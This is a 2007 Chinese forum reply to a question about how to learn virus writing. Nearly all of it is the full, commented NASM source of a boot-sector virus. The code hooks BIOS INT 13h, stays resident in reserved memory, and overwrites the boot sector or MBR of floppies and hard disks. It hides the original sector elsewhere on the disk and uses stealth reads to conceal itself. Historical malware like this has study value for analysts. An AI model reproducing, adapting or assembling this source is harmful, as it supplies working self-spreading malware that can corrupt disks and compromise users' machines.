作者zha0 (zha0)
站内ASM
标题Re: [问题] 有没有人知道怎麽学写病毒?
时间Wed Oct 31 10:45:38 2007
※ 引述《fluteoner (1207)》之铭言:
: 听说病毒是用组语写的
: 有人知道哪里有教怎麽写病毒的教材吗??
: 我没有要做坏事,只是研究领域是资安,
: 想了解病毒攻击电脑的实际例子
: 谢谢
高职写的开机型 XD 作古的玩具 囧rz
; ---------------------------------------------------------------------------
; Historical boot-sector virus sample (16-bit real mode, NASM syntax; the
; 32-bit EAX operations below need a 386+). Posted in 2007 as a study example.
; Kept here for malware-analysis reading only: it hooks INT 13h, stashes the
; original boot sector / MBR elsewhere on the disk, and writes itself over
; the boot sector. Do NOT assemble it onto bootable media.
;
; Image layout (ORG 0, one 512-byte sector):
;   0x000  JMP + NOP, then a 0x3B-byte BPB placeholder (zero here; filled from
;          the victim at infection time)
;   0x03E  boot-time code, then the resident INT 13h hook
;   0x1BE  64-byte partition-table area (also copied from the victim)
;   0x1FE  0x55 0xAA boot signature
;
; Runtime phases:
;   1. Boot: BIOS loads the sector at 0000:7C00. Reserve 1 KB at the top of
;      conventional memory, copy the sector there, swap the INT 13h vector,
;      then INT 19h to restart the bootstrap through the hooked vector.
;   2. Resident (New_INT13h): only cyl 0 / head 0 / sector 1 traffic is
;      touched. Writes to it are dropped; a read of a clean sector infects the
;      disk; a read of an infected sector is replaced by the hidden original
;      ("stealth"). Everything else chains to the saved vector.
; Register use follows the INT 13h convention: AH=function, AL=count,
; CH/CL=cylinder/sector, DH=head, DL=drive (>= 0x80 hard disk), ES:BX=buffer.
; Only BIOS INT 13h traffic passes through this hook.
; ---------------------------------------------------------------------------
ORG 0                                   ; offsets are relative to 0: the resident copy lives at <seg>:0000
                                        ; and the IVT entry installed below is <seg>:New_INT13h
JMP $ + 0x3B + 3                        ; skip the BPB area: 2 (JMP short) + 1 (NOP) + 0x3B = 0x3E,
                                        ; the code offset of a FAT boot sector (assumes NASM's 2-byte short form)
NOP
TIMES 0x3B DB 0                         ; BPB placeholder, overwritten with the victim's BPB at infection time
; CLI                                   ; stack setup left commented out: runs on whatever stack the BIOS provided
XOR DI, DI                              ; DI = 0 -> destination offset of the resident copy
MOV SI, 0x7C00                          ; SI = 0x7C00 -> where the BIOS loaded this sector (segment 0)
; MOV SS,DI
; MOV SP,SI
MOV DS,DI                               ; DS = 0 -> BIOS data area and IVT are addressed through DS
; STI
DEC WORD [DS:0x413]                     ; BDA 0040:0013 = conventional memory size in KB; shrink it by 1 to reserve the top 1 KB
INT 0x12                                ; AX = memory size in KB (already reduced, so it addresses the reserved block)
SHL AX, 6                               ; KB -> segment: 1 KB = 2^10 bytes = 2^6 paragraphs of 2^4 bytes, i.e. 2^(10-4)
MOV ES, AX                              ; ES = segment of the reserved 1 KB at the top of memory
CLD
MOV CX, 0x100
REP MOVSW                               ; copy 256 words = the whole 512-byte sector from 0000:7C00 to <seg>:0000
SHL EAX, 0x10                           ; EAX = segment << 16 (AX still holds the segment); 386+ instruction
MOV AX, New_INT13h                      ; EAX = segment:New_INT13h far pointer in IVT layout (offset low, segment high)
XCHG EAX, [DS:0x4C]                     ; IVT slot 0x13*4: install the hook and fetch the old vector in one swap
MOV DI, Prev_INT13h
STOSD                                   ; store the old vector at ES:Prev_INT13h, i.e. inside the RESIDENT copy (ES = segment),
                                        ; which is where the chain jump and INT13h below read it from
INT 19h                                 ; restart the bootstrap: the BIOS re-reads the boot sector through the hooked INT 13h
New_INT13h:                             ; resident INT 13h hook; entered with the caller's INT frame (flags, CS, IP) on the stack
OR DH, DH                               ; only head 0 is of interest
JNE SHORT Nope
CMP CX, 1                               ; only cylinder 0, sector 1 (boot sector / MBR)
JNE SHORT Nope
CMP AH, 3                               ; AH=3 write sector: refuse it, so the infected sector cannot be overwritten
JE SHORT Avert
CMP AH, 2                               ; AH=2 read sector is the only function handled from here on
JNE SHORT Nope
CALL INT13h                             ; perform the real read first
JNC SHORT Handler                       ; on success, inspect / alter the sector that was just read
Avert: IRET                             ; NOTE(review): IRET reloads the flags the caller pushed, so the BIOS CF of a
                                        ; failed read is lost here, and a dropped write also looks like success
Nope: DB 0xEA                           ; opcode of JMP FAR ptr16:16; its operand is the dword below, so this chains to
Prev_INT13h DD 0                        ; the original INT 13h with the INT frame untouched (patched at boot by STOSD)
Handler:                                ; reached after a successful read of cyl 0 / head 0 / sector 1 into ES:BX
PUSHF                                   ; preserve everything the caller expects back (flags, GPRs, segment registers)
PUSHA
PUSH DS
push ES
CMP BYTE [ES:BX+$],'&'                  ; infection marker: '&' = 0x26 is the ES-override prefix, i.e. the first byte of
                                        ; this very instruction, and $ is its own offset, so this tests whether the sector
                                        ; just read carries the virus body at the same position
JE SHORT Stealth
MOV AX, 0x301                           ; write 1 sector: stash the clean boot sector / MBR (still in ES:BX) at the
CALL Crafty                             ; hiding place chosen by Crafty (write result is not checked)
; CALL INT13h
PUSH ES
PUSH CS
POP ES                                  ; ES = CS, the resident copy, which becomes the image to write
POP DS                                  ; DS = caller's buffer segment
MOV SI, 2                               ; copy the victim's NOP + BPB (offsets 2..0x3D, 0x3C bytes) into the resident
MOV DI, SI                              ; image so the infected sector still describes the filesystem
ADD SI, BX
MOV CX, 0x3C
REP MOVSB
MOV SI, 0x1BE                           ; same for the 64 bytes at 0x1BE (partition table of an MBR)
MOV DI, SI
ADD SI, BX
MOV CX, 64
REP MOVSB
MOV AX, 0x301                           ; write 1 sector from ES:BX = CS:0000 (the patched resident image)
XOR BX, BX
XOR DH, DH                              ; to cyl 0 / head 0 / sector 1 of drive DL: the infection itself
MOV CX, 1
CALL INT13h                             ; result ignored; the caller's buffer still holds the clean sector
JMP SHORT RETurn
Stealth:MOV AX, 0x201                   ; already infected: read the hidden original back into the caller's ES:BX
CALL Crafty                             ; so the caller never sees the virus body (read result is not checked)
;CALL INT13h
RETurn: POP ES
POP DS
POPA
POPF                                    ; flags as saved at Handler entry: CF=0 from the successful read
RETF 2                                  ; return to the INT caller, discarding the pushed flags so that CF=0 is delivered;
                                        ; errors from the Crafty read/write above are therefore never reported
Crafty:                                 ; pick the hiding place for the original sector, then fall into the real INT 13h call
MOV CX, 14                              ; cylinder 0, sector 14 (presumably a rarely used spot; verify per media type)
OR DL, DL                               ; DL >= 0x80 (sign bit set) = hard disk: keep head 0 (DH is 0 here, see the head check)
JS SHORT INT13h
MOV DH, 1                               ; floppy: use head 1 instead
INT13h: PUSHF                           ; emulate INT: push flags, then far-call the saved original vector
CALL DWORD [CS:Prev_INT13h]             ; CS override because Prev_INT13h lives in the resident segment
RET                                     ; returns with the flags the BIOS left (CF = error), as the JNC above relies on
TIMES 512-2-($-$$) DB 0                 ; pad to 510 bytes
DB 55h, 0AAH                            ; boot-sector signature 0xAA55